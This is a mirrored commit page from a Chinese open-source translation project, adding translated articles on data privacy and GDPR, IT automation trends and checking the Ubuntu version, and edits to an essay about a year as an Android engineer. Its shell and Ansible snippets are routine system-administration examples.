mirror of
https://github.com/LCTT/TranslateProject.git
synced 2025-01-13 22:30:37 +08:00
commit
30747f1001
.gitignore (vendored)

@@ -3,3 +3,5 @@ members.md
 *.html
 *.bak
 .DS_Store
+sources/*/.*
+translated/*/.*

published/20180128 Being open about data privacy.md (new file, 95 lines)

@@ -0,0 +1,95 @@

对数据隐私持开放的态度
======

> 尽管有包括 GDPR 在内的法规,数据隐私对于几乎所有的人来说都是很重要的事情。

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/GOV_opendata.png?itok=M8L2HGVx)

今天(LCTT 译注:本文发表于 2018/1/28)是<ruby>[数据隐私日][1]<rt>Data Privacy Day</rt></ruby>(在欧洲叫“<ruby>数据保护日<rt>Data Protection Day</rt></ruby>”)。你可能会认为现在我们处于一个开源的世界中,所有的数据都应该是自由的,[就像人们想的那样][2],但是现实并没那么简单。主要有两个原因:

1. 我们中的大多数(不仅仅是在开源界)认为至少有些关于我们自己的数据是不愿意分享出去的(我在之前发表的一篇文章中列举了一些[例子][3]);
2. 我们很多人虽然在开源领域工作,但事实上是为商业公司或其他组织工作,也要在合法的范围内分享数据。

所以实际上,数据隐私对于每个人来说都是很重要的。

事实证明,在允许组织使用哪些数据这个问题上,美国和欧洲的人们和政府的出发点有些不同。前者通常为商业实体(愤世嫉俗的人们会特别指出是大型商业实体)利用他们所收集到的关于我们的数据提供了更多的自由度;而在欧洲,一直以来持有的是另一种观念,即应该有更多的约束限制,而且在 5 月 25 日,欧洲的观点可以说取得了胜利。

### 通用数据保护条例(GDPR)的影响

那是一个相当大胆的说法,但事实是:这一天正是欧盟在 2016 年通过的一项称之为<ruby>通用数据保护条例<rt>General Data Protection Regulation</rt></ruby>(GDPR)的立法开始实施的日期。通用数据保护条例在私人数据怎样才能被保存、如何才能被使用、谁能使用、能被持有多长时间这些方面设置了严格的规则。它描述了什么数据属于私人数据——而且涉及的条目范围非常广泛,从你的姓名、家庭住址到你的医疗记录以及连接你电脑的 IP 地址。

通用数据保护条例的重要之处是它并不仅仅适用于欧洲的公司。如果你是阿根廷、日本、美国或者俄罗斯的公司,而且你正在收集涉及到欧盟居民的数据,你就要受到这个条例的约束管辖。

“哼!”你可能会这样说 ^注1,“我的业务不在欧洲:他们能对我有啥约束?”答案很简单:如果你想继续在欧盟做任何生意,你最好遵守,因为一旦你违反了通用数据保护条例的规则,你将会受到最高相当于你的全球总收入百分之四的惩罚。是的,你没听错:是全球总收入,而不是仅仅在欧盟某一国家的收入,也不只是净利润,而是全球总收入。这足以让你的法律团队紧张起来,他们会知会你的整个团队,同时也会立即敦促你的 IT 团队,确保你们的行为在相当短的时间内合规。

看上去这和非欧盟公民没有什么相关性,但其实不然。对大多数公司来说,对所有的顾客、合作伙伴以及员工实行同样的数据保护措施,而不是仅针对欧盟公民单独实施,是件既简单又划算的事情。^注2

然而,通用数据保护条例不久将在全球适用并不意味着一切都会变得很美好 ^注3:事实并非如此,我们一直在丢弃关于我们自己的信息——而且允许公司去使用它。

有一句话是这么说的(尽管很有争议):“如果你没有在付费,那么你就是产品。”这句话的意思就是如果你没有为某一项服务付费,那么其他人就在付费使用你的数据。你有付费使用 Facebook、推特、谷歌邮箱吗?你觉得他们是如何赚钱的?大部分是通过广告。一些人会争论说那只是他们向你提供的一项服务而已,但事实上是他们在利用你的数据从广告商那里获取收益。你不是广告商真正的顾客——只有当你看了广告后买了他们的商品,你才变成了他们的顾客;在那之前,交易只发生在广告平台和广告商之间。

有些服务允许你通过付费来消除广告(流媒体音乐平台声破天就是这样的),但从另一方面来讲,即使是付费的服务也可能插入广告(例如,亚马逊正在努力让 Alexa 播广告)。除非我们想要开始为这些所有的“免费”服务付费,否则我们需要清楚我们所放弃的是什么,并且在我们愿意暴露的和不想暴露的信息之间做出选择。

### 谁是顾客?

另一个一直困扰着我们的数据问题,是数据产生量的直接结果。有许多组织一直在产生巨量的数据,包括公共组织,比如大学、医院或者政府部门 ^注4——而且他们没有能力长久地储存这些数据。如果这些数据没有长久的价值也就没什么要紧,但事实正好相反:处理大数据的工具正在不断开发出来,这些组织也认识到,他们现在以及在不久的将来都能够去挖掘这些数据。

然而他们面临的问题是,随着数据的增长,存储量无法跟上,该怎么办。幸运的是——我是带着讽刺意味使用这个词的 ^注5——大公司正在介入帮助他们。“把你们的数据给我们,”他们说,“我们将免费保存。我们甚至让你随时能够使用你所收集到的数据!”这听起来很棒,是吗?这是大公司 ^注6 站在慈善的立场上,帮助公共组织管理他们收集到的关于我们的数据的一个极具代表性的例子。

不幸的是,慈善并不是唯一的动机。这些帮助是附有条件的:作为同意保存数据的交换,这些公司得到了将数据访问权限出售给第三方的权利。你认为公共组织,或者是被收集数据的人,在数据使用权被出售给第三方时,以及在第三方如何使用数据上能有发言权吗?我将把这个问题当做一个练习留给读者去思考。^注7

### 开放和积极

然而并不全是坏消息。政府中有一项正在逐渐发展起来的“开放数据”运动,鼓励各个部门将他们的大量数据免费开放给公众或者其他组织。在某些情况下,这是专门立法推动的。许多志愿组织——尤其是那些接受公共资金的——也正在开始这样做。甚至商业组织也有感兴趣的苗头。而且,围绕差分隐私和多方安全计算等方向的一些技术已经开始可行,使得跨越多个数据集挖掘数据而不过多披露个人信息成为可能——这在计算上比你想象的更接近现实。

这些对我们来说意味着什么呢?我之前在 Opensource.com 上写过关于[开源的共享福利][4]的文章,而且我越来越相信我们需要把视野从软件拓展到其他领域:硬件、组织,以及与这次讨论有关的——数据。让我们假设你是 A 公司,要向另一家公司客户 B 提供一项服务 ^注8。在此有四种不同类型的数据:

1. 数据完全开放:对 A 和 B 都可得到,世界上任何人都可以得到;
2. 数据是已知的、共享的和机密的:A 和 B 可得到,但其他人不能得到;
3. 数据在公司级别上保密:A 公司可以得到,但 B 客户不能;
4. 数据在客户级别上保密:B 客户可以得到,但 A 公司不能。

首先,也许我们对数据应该更开放些,将数据默认放到选项 1 中。如果那些数据对所有人开放,在无人驾驶、语音识别、矿藏以及人口统计等领域将会有相当大的作用。^注9 如果我们能够找到方法,把选项 2、3 和 4 中的数据——或者至少其中的一部分——也放到选项 1 中,同时仍将细节保密,不是很好吗?这正是研究这些新技术的希望所在。

然而还有很长的路要走,所以不要太兴奋。同时,可以开始考虑将你的一些数据默认开放。

### 一些具体的措施

我们该如何处理数据的隐私和开放?下面是我想到的一些具体的措施,欢迎大家评论做出更多的贡献:

* 检查你的组织是否正在认真严格地执行通用数据保护条例。如果没有,去推动实施它。
* 默认加密敏感数据(或者适当的时候用散列算法),当不再需要的时候及时删掉——除非数据正在被处理使用,否则没有任何借口让数据以明文形式保存。
* 当你注册一个服务的时候,考虑一下你公开了什么信息,特别是社交媒体类的。
* 和你的非技术朋友讨论这个话题。
* 教育你的孩子、你朋友的孩子以及他们的朋友。最好是去他们的学校,和老师们谈谈,在学校里做些宣讲。
* 鼓励你所服务和志愿贡献的组织推动数据的默认开放。不要问“为什么要开放数据”,而是从“为什么不开放数据”问起。
* 尝试访问一些开放数据。挖掘它、开发应用来使用它、进行数据分析、画漂亮的图,^注10 制作有趣的音乐,总之考虑用它来做些事情。告诉那些组织你正在使用它们的数据,感谢它们,并且鼓励它们做得更多。
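
上面的清单提到“默认加密敏感数据(或者适当的时候用散列算法)”。下面是一个极简的 shell 示意(假设在带有 GNU coreutils 的 Linux 上,`sha256sum` 可用;其中的邮箱地址是虚构的示例数据),展示如何对一个敏感字段做散列,从而避免明文保存:

```shell
# 极简示意:用 SHA-256 对敏感字段(这里是一个虚构的邮箱)做散列,
# 这样日志或数据库里保存的就不再是明文。
# 注意:对邮箱这类低熵数据,实际使用时应当加盐(salt),此处为演示从简。
email="alice@example.com"   # 虚构示例数据
hash=$(printf '%s' "$email" | sha256sum | awk '{print $1}')
echo "$hash"
```

得到的是一个 64 位十六进制摘要;需要比对时只比对摘要,不必还原原文。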

**注:**

1. 我承认你也可能不会这样说。
2. 假设你坚信你的个人数据应该被保护。
3. 如果你在琢磨“美好”一词的寓意,在这一点上你并不孤单。
4. 事实上这些机构能够有多开放,取决于你所居住的地方。
5. 鉴于我是英国人,那是非常非常大剂量的讽刺。
6. 而且他们必须是巨大的公司:没有其他人能够负担得起这么大的存储和基础架构来使数据保持可用。
7. 不,答案是“不”。
8. 尽管这个例子也同样适用于个人。看看:A 可能是 Alice,B 可能是 Bob……
9. 当然,并不是说我们应该暴露个人数据,或者让本应保密的数据泄露——不是那类的数据。
10. 我的一个朋友发现,每当她去接孩子放学的时候总是下雨。为了排除确认偏误,她在整个学年里都记录天气信息并制作了图表,分享到了社交媒体上。

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/1/being-open-about-data-privacy

作者:[Mike Bursell][a]
译者:[FelixYFZ](https://github.com/FelixYFZ)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/mikecamel
[1]:https://en.wikipedia.org/wiki/Data_Privacy_Day
[2]:https://en.wikipedia.org/wiki/Information_wants_to_be_free
[3]:https://aliceevebob.wordpress.com/2017/06/06/helping-our-governments-differently/
[4]:https://opensource.com/article/17/11/commonwealth-open-source
[5]:http://www.outpost9.com/reference/jargon/jargon_40.html#TAG2036

@@ -0,0 +1,132 @@

IT 自动化的下一步是什么:6 大趋势
======

> 自动化专家分享了一些对[自动化][6]不远的将来的看法。请把这些趋势保留在你的视线之内。

![](https://enterprisersproject.com/sites/default/files/styles/620x350/public/cio_ai_artificial_intelligence.png?itok=o0csm9l2)

我们最近讨论了[推动 IT 自动化的因素][1],可以看到[当前的趋势][2]正在增长,也为刚开始对部分流程进行自动化的组织分享了一些[有用的技巧][3]。

噢,我们也分享了如何在贵公司[提出自动化的论证][4]以及[长期成功的关键][5]的专家建议。

现在,只剩下一个问题:自动化的下一步是什么?我们邀请了一些专家分享一下[自动化][6]不远的将来的看法。以下是他们建议 IT 领域领导者需要密切关注的六大趋势。

### 1、机器学习的成熟

尽管关于[机器学习][7](以及类似的“自我学习系统”)的讨论很多,但对于绝大多数组织来说,实际执行起来仍然为时过早。不过预计这将发生变化,机器学习将在下一次 IT 自动化浪潮中扮演至关重要的角色。

[Advanced Systems Concepts, Inc.][8] 公司的工程总监 Mehul Amin 指出,机器学习是 IT 自动化下一个关键增长领域之一。

“随着数据量的增长,自动化软件理应可以自我决策,否则这就还是开发人员的责任”,Amin 说。“例如,开发者构建了需要执行的内容,但通过使用分析系统内部数据的软件,可以确定执行该流程的最佳系统。”

把这个想法再延伸一下。Amin 指出,机器学习可以使自动化系统在必要的时候提供额外的资源,以满足时间线或 SLA 的需要,同样也可以在不需要的时候释放这些资源,等等。

显然不只有 Amin 一个人这样认为。

“IT 自动化正在走向自我学习的方向”,[Sungard Availability Services][9] 公司首席架构师 Kiran Chitturi 表示,“系统将能够测试和监控自己,从而增强业务流程和软件交付能力。”

Chitturi 指出自动化测试就是个例子。脚本测试已经被广泛采用,但很快这些自动化测试流程将能够更容易地学习、更快地发展,例如从新开发的代码中学习,或识别其对生产环境更广泛的影响。

### 2、人工智能催生的自动化

上述原则同样适用于相关的(但是独立的)[人工智能][10]领域。取决于你对人工智能的定义,机器学习可能在短期内对 IT 产生更大的影响(并且我们可能会看到这两个领域的许多重叠的定义和理解)。可以认为,新兴的人工智能技术同样也会产生新的自动化机会。

[SolarWinds][11] 公司技术负责人 Patrick Hubbard 说,“人工智能和机器学习的整合普遍被认为对未来几年的商业成功起至关重要的作用。”

### 3、这并不意味着不再需要人力

让我们试着安慰一下那些不知所措的人:前两种趋势并不一定意味着我们将失去工作。

这很可能意味着各种角色的改变,以及[全新角色][12]的创造。

但是至少在可预见的将来,你还不必对机器人鞠躬。

“一台机器只能运行在给定的环境变量中——它不能选择包含新的变量,在今天只有人类可以这样做,”Hubbard 解释说。“但是,对于 IT 专业人员来说,这将需要培养 AI 和自动化技能,例如对程序设计、编程、管理人工智能和机器学习功能算法的基本理解,以及用强大的安全态势面对更复杂的网络攻击。”

Hubbard 分享了一些新工具或功能的例子,例如支持人工智能的安全软件,或者可以远程发现石油管道中维护需求的机器学习应用程序。两者都可以提高效率和效果,但不会取代所需的信息安全或管道维护人员。

“许多新功能仍需要人工监控,”Hubbard 说。“例如,为了让机器确定一些‘预测’是否可能成为‘规律’,人为的管理是必要的。”

即使你把机器学习和 AI 先放在一边,只看一般的 IT 自动化,同样的原理也是成立的,尤其是在软件开发生命周期中。

[Juniper Networks][13] 公司自动化首席架构师 Matthew Oswalt 指出,IT 自动化增长的根本原因,是它通过减少操作基础设施所需的人工工作量来创造直接价值。

> 操作工程师可以使用事件驱动的自动化,以代码的形式提前定义他们的工作流程,而不是在凌晨 3 点来应对基础设施的问题。

“它也将操作工作流程表示为代码,而不再是容易过时的文档或部落知识,”Oswalt 解释说。“操作人员仍然需要在指导[自动化]工具响应事件方面发挥积极作用。采用自动化的下一个阶段,是建立一个能够识别在整个 IT 领域内发生的有趣事件、并以自主方式进行响应的系统。操作工程师可以使用事件驱动的自动化,以代码的形式提前定义他们的工作流程,而不是在凌晨 3 点来应对基础设施的问题。他们可以依靠这个系统在任何时候以同样的方式作出回应。”
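
Oswalt 所说的“以代码的形式提前定义工作流程”,可以用一个极简的(假想的)事件分发函数来示意——事件名和对应的动作都是为演示而虚构的:

```shell
# 极简示意:事件驱动自动化的雏形。handle_event 把“事件”映射到
# 预先定义好的“工作流程”;真实系统里的动作会是重启服务、扩容等,
# 这里只输出将要执行的动作(全部为虚构示例)。
handle_event() {
    case "$1" in
        disk_full)    echo "action: clean-tmp" ;;         # 磁盘告警 -> 清理
        service_down) echo "action: restart-service" ;;   # 服务宕机 -> 重启
        *)            echo "action: page-oncall" ;;       # 未知事件 -> 呼叫值班
    esac
}

handle_event disk_full       # → action: clean-tmp
handle_event unknown_event   # → action: page-oncall
```

无论事件发生在凌晨 3 点还是白天,这样的系统都会以同样的方式作出回应——这正是上文引文的要点。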

### 4、对自动化的焦虑将会减少

SolarWinds 公司的 Hubbard 指出,“自动化”一词本身就产生大量的不确定性和担忧,不仅仅是在 IT 领域,而且是跨专业领域的,他说这种担忧是合理的。但一些随之而来的担忧可能被夸大了,甚至科技产业本身也在助长这种担忧。现实可能恰恰是化解这种焦虑的良药:当自动化的实际实施和实践帮助人们认识到这个列表中的第 3 项时,我们将看到第 4 项的出现。

“今年我们可能会看到对自动化的焦虑有所减少,更多的组织开始接受人工智能和机器学习,将其作为增强现有人力资源的一种方式,”Hubbard 说。“自动化在历史上为更多的工作创造了空间,它通过降低完成较小任务的成本和时间,将劳动力重新集中到无法自动化并需要人力的事情上。人工智能和机器学习也是如此。”

自动化还将减少另一些令 IT 领导者神经紧张的焦虑:安全。正如[红帽][14]公司首席架构师 Matt Smith 最近[指出][15]的那样,自动化将越来越多地帮助 IT 部门降低与维护任务相关的安全风险。

他的建议是:“首先记录并自动化维护活动期间 IT 资产之间的交互。通过依靠自动化,您不仅可以消除以前需要大量手动操作和精细技巧的任务,还可以降低人为错误的风险,并展示当您的 IT 组织采纳变更和新的工作方法时可能发生的情况。最终,这将迅速减少对应用安全补丁的抵制。而且它还可以帮助您的企业在下一次重大安全事件中避免登上头条新闻。”

**[ 阅读全文:[12 个要改掉的企业安全坏习惯][16] ]**

### 5、脚本和自动化工具将持续发展

许多组织迈向更多自动化的第一步,通常是以脚本或自动化工具(有时称为配置管理工具)的形式进行的“早期”工作。

但是随着各种自动化技术的使用,对这些工具的看法也在不断发展。

[DataVision][18] 首席运营官 Mark Abolafia 表示:“数据中心环境中存在很多重复性过程,容易出现人为错误,[Ansible][17] 等技术有助于缓解这些问题。通过 Ansible,人们可以为一组操作编写特定的步骤,并输入不同的变量,例如地址等,使过去需要人工干预和更长交付时间的长过程链实现自动化。”
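
Abolafia 提到的“为一组操作编写特定的步骤,并输入不同的变量”,在 Ansible 中大致就是下面这样的一个<ruby>剧本<rt>playbook</rt></ruby>片段——其中的主机组、变量名和任务内容都是为演示而虚构的:

```yaml
# 虚构示例:对 webservers 主机组执行两步固定流程,地址等通过变量传入
- hosts: webservers
  become: true
  vars:
    listen_address: 10.0.0.10   # 示例变量,实际按环境传入
  tasks:
    - name: Ensure nginx is installed
      apt:
        name: nginx
        state: present
    - name: Template the site config with the given address
      template:
        src: site.conf.j2
        dest: /etc/nginx/conf.d/site.conf
```

同一份剧本换一组变量就能重复套用到不同环境,这正是它减少人为错误的原因。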

**[ 想了解更多关于 Ansible 这个方面的知识吗?阅读相关文章:[使用 Ansible 时的成功秘诀][19]。 ]**

另一个因素是:工具本身将继续变得更先进。

“使用先进的 IT 自动化工具,开发人员将能够在更短的时间内构建和自动化工作流程,减少易出错的编码,”ASCI 公司的 Amin 说。“这些工具包括预先构建的、预先测试过的拖放式集成、API 作业、丰富的变量使用、参考功能和对象修订历史记录。”

### 6、自动化开创了新的指标机会

正如我们在此前所说的那样,IT 自动化不是万能的。它不会修复被破坏的流程,也不会以其他方式为您的组织提供全面的灵丹妙药。这一点也是持续成立的:自动化并不能消除衡量性能的必要性。

**[ 参见我们的相关文章:[DevOps 指标:你在衡量重要的东西吗?][20] ]**

实际上,自动化应该会打开新的衡量机会。

[Janeiro Digital][21] 公司架构负责人 Josh Collins 说,“随着越来越多的开发活动——源代码管理、DevOps 管道、工作项目跟踪等——转向 API 驱动的平台,将这些原始数据拼接在一起、以描绘组织效率图景的机会也越来越多”。

Collins 认为这是一种可能的新型“开发组织度量指标”。但不要误认为这意味着机器和算法可以突然预测 IT 所做的一切。

“无论是衡量个人还是整体团队,这些指标都可能很强大——但应该结合大量的上下文来看待,”Collins 说,“将这些数据用于把握高层次的趋势、印证定性的观察——而不是机械地给你的团队打分。”

**想要更多这样的知识吗,IT 领导者?[注册我们的每周电子邮件通讯][22]。**

--------------------------------------------------------------------------------

via: https://enterprisersproject.com/article/2018/3/what-s-next-it-automation-6-trends-watch

作者:[Kevin Casey][a]
译者:[MZqk](https://github.com/MZqk)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://enterprisersproject.com/user/kevin-casey
[1]:https://enterprisersproject.com/article/2017/12/5-factors-fueling-automation-it-now
[2]:https://enterprisersproject.com/article/2017/12/4-trends-watch-it-automation-expands
[3]:https://enterprisersproject.com/article/2018/1/getting-started-automation-6-tips
[4]:https://enterprisersproject.com/article/2018/1/how-make-case-it-automation
[5]:https://enterprisersproject.com/article/2018/1/it-automation-best-practices-7-keys-long-term-success
[6]:https://enterprisersproject.com/tags/automation
[7]:https://enterprisersproject.com/article/2018/2/how-spot-machine-learning-opportunity
[8]:https://www.advsyscon.com/en-us/
[9]:https://www.sungardas.com/en/
[10]:https://enterprisersproject.com/tags/artificial-intelligence
[11]:https://www.solarwinds.com/
[12]:https://enterprisersproject.com/article/2017/12/8-emerging-ai-jobs-it-pros
[13]:https://www.juniper.net/
[14]:https://www.redhat.com/en?intcmp=701f2000000tjyaAAA
[15]:https://enterprisersproject.com/article/2018/2/12-bad-enterprise-security-habits-break
[16]:https://enterprisersproject.com/article/2018/2/12-bad-enterprise-security-habits-break?sc_cid=70160000000h0aXAAQ
[17]:https://opensource.com/tags/ansible
[18]:https://datavision.com/
[19]:https://opensource.com/article/18/2/tips-success-when-getting-started-ansible?intcmp=701f2000000tjyaAAA
[20]:https://enterprisersproject.com/article/2017/7/devops-metrics-are-you-measuring-what-matters?sc_cid=70160000000h0aXAAQ
[21]:https://www.janeirodigital.com/
[22]:https://enterprisersproject.com/email-newsletter?intcmp=701f2000000tsjPAAQ

@@ -0,0 +1,134 @@

如何轻松地检查 Ubuntu 版本以及其它系统信息
======

> 摘要:想知道你正在使用的 Ubuntu 具体是什么版本吗?这篇文章将告诉你如何检查你的 Ubuntu 版本、桌面环境以及其他相关的系统信息。

通常,你能非常容易地通过命令行或者图形界面获取你正在使用的 Ubuntu 的版本。当你正在尝试学习一篇互联网上的入门教程,或者正在各种论坛里获取帮助的时候,知道当前正在使用的 Ubuntu 的确切版本号、桌面环境以及其他的系统信息将是尤为重要的。

在这篇简短的文章中,作者将展示各种检查 [Ubuntu][1] 版本以及其他常用系统信息的方法。

### 如何在命令行检查 Ubuntu 版本

这是获得 Ubuntu 版本的最好的办法。我本想先展示如何用图形界面做到这一点,但是我决定还是先从命令行方法说起,因为这种方法不依赖于你使用的任何[桌面环境][2]。你可以在 Ubuntu 的任何变种系统上使用这种方法。

打开你的命令行终端(`Ctrl+Alt+T`),键入下面的命令:

```
lsb_release -a
```

上面命令的输出应该如下:

```
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.4 LTS
Release: 16.04
Codename: xenial
```

![How to check Ubuntu version in command line][3]

正像你所看到的,当前我的系统安装的 Ubuntu 版本是 Ubuntu 16.04,版本代号:Xenial。

且慢!为什么版本描述中显示的是 Ubuntu 16.04.4 而发行版本是 16.04?到底哪个才是正确的版本?16.04 还是 16.04.4?这两者之间有什么区别?

如果言简意赅地回答这个问题的话,那么答案应该是你正在使用 Ubuntu 16.04。这是基准版本,而 16.04.4 进一步指明这是 16.04 的第四个补丁版本。你可以将补丁版本理解为 Windows 世界里的服务包。在这里,16.04 和 16.04.4 都是正确的版本号。

那么输出中的 Xenial 又是什么?那正是 Ubuntu 16.04 的版本代号。你可以阅读下面这篇文章获取更多信息:[了解 Ubuntu 的命名惯例][4]。

#### 其他一些获取 Ubuntu 版本的方法

你也可以使用下面的命令得到 Ubuntu 的版本:

```
cat /etc/lsb-release
```

输出如下信息:

```
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
```

![How to check Ubuntu version in command line][5]
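
如果想在脚本里只取出版本号而不是整段输出,可以直接解析这种 `KEY=VALUE` 格式。下面是一个极简的示意(为便于演示,把一份示例内容内嵌在脚本里;在真机上可以把 `lsb_output` 换成 `cat /etc/lsb-release` 的结果):

```shell
# 极简示意:从 /etc/lsb-release 风格的 KEY=VALUE 文本中提取发行版本号。
# 真机上可用:lsb_output=$(cat /etc/lsb-release)
lsb_output='DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"'

# sed 只打印以 DISTRIB_RELEASE= 开头的行,并去掉键名部分
release=$(printf '%s\n' "$lsb_output" | sed -n 's/^DISTRIB_RELEASE=//p')
echo "$release"   # → 16.04
```

这样脚本后续就可以直接用 `$release` 做版本判断,而不必人工读取整段输出。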

你还可以使用下面的命令来获得 Ubuntu 版本:

```
cat /etc/issue
```

命令行的输出将会如下:

```
Ubuntu 16.04.4 LTS \n \l
```

不要介意输出末尾的 `\n \l`。这里 Ubuntu 版本就是 16.04.4,或者更加简单:16.04。

### 如何在图形界面下得到 Ubuntu 版本

在图形界面下获取 Ubuntu 版本更是小事一桩。这里我使用了 Ubuntu 18.04 的图形界面系统 GNOME 的屏幕截图来展示如何做到这一点。如果你在使用 Unity 或者别的桌面环境的话,显示可能会有所不同。这也是为什么我推荐使用命令行方式来获得版本的原因:你不用依赖形形色色的图形界面。

下面我来展示如何在桌面环境获取 Ubuntu 版本。

进入“系统设置”并点击下面的“详细信息”栏。

![Finding Ubuntu version graphically][6]

你将会看到系统的 Ubuntu 版本和其他与桌面系统有关的系统信息。这里的截图来自 [GNOME][7]。

![Finding Ubuntu version graphically][8]

### 如何知道桌面环境以及其他的系统信息

你刚才学习的是如何得到 Ubuntu 的版本信息,那么如何知道桌面环境呢?更进一步,如果你还想知道当前使用的 Linux 内核版本呢?

有各种各样的命令可以用来得到这些信息,不过今天我想推荐一个命令行工具,叫做 [Neofetch][9]。这个工具能在命令行完美展示系统信息,包括 Ubuntu 或者其他 Linux 发行版的系统图标。

用下面的命令安装 Neofetch:

```
sudo apt install neofetch
```

安装成功后,运行 `neofetch` 将会优雅地展示系统的信息如下。

![System information in Linux terminal][10]

如你所见,`neofetch` 完整展示了 Linux 内核版本、Ubuntu 的版本、桌面系统版本以及环境、主题和图标等等信息。

希望我上面展示的方法能帮你更快地找到你正在使用的 Ubuntu 版本和其他系统信息。如果你对这篇文章有其他的建议,欢迎在评论栏里留言。

再见。:)

--------------------------------------------------------------------------------

via: https://itsfoss.com/how-to-know-ubuntu-unity-version/

作者:[Abhishek Prakash][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[DavidChenLiang](https://github.com/davidchenliang)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]: https://itsfoss.com/author/abhishek/
[1]:https://www.ubuntu.com/
[2]:https://en.wikipedia.org/wiki/Desktop_environment
[3]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/check-ubuntu-version-command-line-1-800x216.jpeg
[4]:https://itsfoss.com/linux-code-names/
[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/check-ubuntu-version-command-line-2-800x185.jpeg
[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/ubuntu-version-system-settings.jpeg
[7]:https://www.gnome.org/
[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/checking-ubuntu-version-gui.jpeg
[9]:https://itsfoss.com/display-linux-logo-in-ascii/
[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/ubuntu-system-information-terminal-800x400.jpeg
@@ -2,7 +2,8 @@ Android 工程师的一年
============================================================

![](https://cdn-images-1.medium.com/max/2000/1*tqshw1o4JZZlA1HW3Cki1Q.png)

> 这幅妙绝的绘画来自 [Miquel Beltran][0]

我的技术生涯,从两年前算起。开始是 QA 测试员,一年后就转入开发人员角色。没怎么努力,也没有投入过多的个人时间。

@@ -12,7 +13,7 @@ Android 工程师的一年
我的第一个职位角色,Android 开发者,开始于一年前。我工作的这家公司,可以花一半的时间去尝试其它角色的工作,这给我从 QA 职位转到 Android 开发者职位创造了机会。

这一转变归功于我在晚上和周末投入学习 Android 的时间。我通过了 [Android 基础纳米学位][3]、[Android 工程师纳米学位][4]课程,也获得了 [Google 开发者认证][5]。这部分的详细故事在[这儿][6]。

两个月后,公司雇佣了另一位 QA,我转向全职工作。挑战从此开始!

@@ -46,29 +47,27 @@ Android 工程师的一年
一个例子就是拉取代码进行公开展示和代码审查。有时我会请同事私下检查我的代码,并不想通过公开的拉取请求向任何人展示。

其他时候,当我做代码审查时,会花好几分钟盯着“批准”按钮犹豫不决,担心审查通过的代码会被其他同事找出毛病。

当我在一些事上持反对意见时,由于缺乏相关知识,担心被坐冷板凳,从来没有大声说出来过。

> 某些时候我会请同事私下[...]检查我的代码,以避免被公开展示。

* * *

### 新的公司,新的挑战

后来,我手边有了个新的机会。感谢曾经和我共事的朋友,我被 [Babbel][7] 邀请去参加初级 Android 工程师职位的招聘流程。

我见到了他们的团队,同时自告奋勇地在他们办公室主持了一次本地会议。此事让我下定决心要申请这个职位。我喜欢公司的箴言:全民学习。其次,公司每个人都非常友善,在那儿工作看起来很愉快!但我没有马上申请,因为我认为自己不够好,那为什么要申请呢?

还好我的朋友和搭档推动我这样做,他们给了我发送简历的力量和勇气。过后不久就进入了面试流程。这很简单:以很小的程序的形式来进行编码挑战,随后是和团队一起的技术面试,之后是和招聘经理间关于团队合作的面试。

#### 招聘过程

我用周末的时间来完成编码挑战的项目,并在周一就立即发送过去。不久就受邀去现场面试。

技术面试是关于编程挑战本身,我们谈论了 Android 好的不好的地方、我为什么以这种方式实现这个功能,以及如何改进等等。随后是招聘经理进行的一次简短的关于团队合作的面试,也有涉及到编程挑战的事,我们谈到了我面临的挑战,我如何解决这些问题,等等。

最后,通过面试,得到 offer,我接受了!

我的 Android 工程师生涯的第一年,有九个月在一个公司,后面三个月在当前的公司。

@@ -88,7 +87,7 @@ Android 工程师的一年
两次三次后,压力就堵到胸口。为什么我还不知道?为什么就那么难理解?这种状态让我焦虑万分。

我意识到我需要承认我确实不懂某个特定的主题,但第一步是要知道有这么个概念!有时,仅仅需要的就是更多的时间、更多的练习,最终会“在大脑中完全演绎” :-)

例如,我常常为 Java 的接口类和抽象类所困扰,不管看了多少的例子,还是不能完全明白它们之间的区别。但一旦我使用后,即使还不能解释其工作原理,也知道了怎么使用以及什么时候使用。

@@ -102,19 +101,13 @@ Android 工程师的一年
工程师的角色不仅仅是编码,而是广泛的技能。我仍然处于旅程的起点,在掌握它的道路上,我想着重于以下几点:

* 交流:因为英文不是我的母语,所以有的时候我需要努力传达我的想法,这在我工作中是至关重要的。我可以通过写作、阅读和交谈来解决这个问题。
* 提有建设性的反馈意见:我想给同事有意义的反馈,这样我们一起共同发展。
* 为我的成就感到骄傲:我需要创建一个列表来跟踪各种成就,无论大小,或整体进步,所以当我挣扎时我可以回顾并感觉良好。
* 不要着迷于不知道的事情:当有很多新事物出现时很难做到都知道,所以只关注必须的、手头项目需要的东西,这是非常重要的。
* 多和同事分享知识:我是初级的并不意味着没有可以分享的!我需要持续分享我感兴趣的文章及讨论话题。我知道同事们会感激我的。
* 耐心和持续学习:和现在一样保持不断学习,但对自己要有更多耐心。
* 自我保健:随时注意休息,不要为难自己。放松也富有成效。

@@ -122,7 +115,7 @@ Android 工程师的一年
--------------------------------------------------------------------------------

via: https://proandroiddev.com/a-year-as-android-engineer-55e2a428dfc8

作者:[Lara Martín][a]
译者:[runningwater](https://github.com/runningwater)
校对:[wxy](https://github.com/wxy)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
@@ -1,91 +1,92 @@
